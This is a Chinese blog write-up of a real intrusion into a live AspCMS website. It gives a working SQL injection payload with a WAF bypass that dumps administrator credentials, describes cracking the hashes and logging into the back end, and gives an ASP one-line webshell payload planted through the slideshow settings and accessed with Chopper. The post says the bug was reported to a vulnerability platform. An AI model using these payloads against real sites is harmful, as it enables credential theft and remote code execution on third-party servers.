实战

真实的渗透经历

前情提要

1
2
3
4
5
6
7
8
因为新生培训,最近重学了一波owsap top10的基础内容,然后想着现在运行的站是不是没有sql注入利用的洞了?
后来看到aspcms框架的漏洞,发现还真有sql的洞,于是就去找哪些还在运行的aspcms的网站,后来找到了,于是试了试payload:
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user
对这个payload的解释其实进行urldecode之后就变成了:
/plug/comment/commentList.asp?id=0 unmasterion semasterlect top 1 UserID,GroupID,LoginName,Password,now(),null,1 frmasterom {prefix}user
在仔细一看union select top 1 ....就是查数据的sql,只不过利用了waf对于master的单层过滤bypass了,于是爆出了admin以及md5加密过后的密码,admin的密码太难破解了,于是乎,我又看了看sql的payload,发现top 5能够爆出其他数据,于是尝试破解其他的md5值,结果成功破解了超级管理员用户的密码
对域名进行信息收集,获取了后台管理界面的url,利用爆出的数据成功登录

展示
展示

web的信息

1
2
iis10.0 windows的服务器,因为ii7.5以上的版本就已经把解析漏洞给修复了
所以不能利用解析漏洞写入shell

getshell

1
2
3
4
在aspcms漏洞信息上,发现了一个应该是存储xss的方式写入shell
在管理页面的扩展功能下找到幻灯片设置将前端slidestyle 的value改成
1%><%Eval(Request (chr(83)))%><%
保存,即可写入shell,利用菜刀连接,成功拿到shell

后续

1
补天已收录
文章目录
  1. 1. 真实的渗透经历
    1. 1.0.1. 前情提要
    2. 1.0.2. web的信息
    3. 1.0.3. getshell
    4. 1.0.4. 后续
,